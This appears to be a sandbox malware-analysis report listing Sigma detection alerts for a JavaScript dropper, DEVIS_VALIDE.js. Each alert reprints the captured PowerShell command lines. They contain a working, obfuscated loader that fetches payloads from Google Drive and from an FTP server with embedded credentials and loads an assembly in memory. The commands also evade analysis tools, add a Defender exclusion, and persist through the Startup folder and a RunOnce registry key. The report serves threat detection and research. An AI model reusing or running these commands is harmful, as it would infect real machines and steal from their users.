Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 4944, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", ProcessId: 7136, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_lme

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

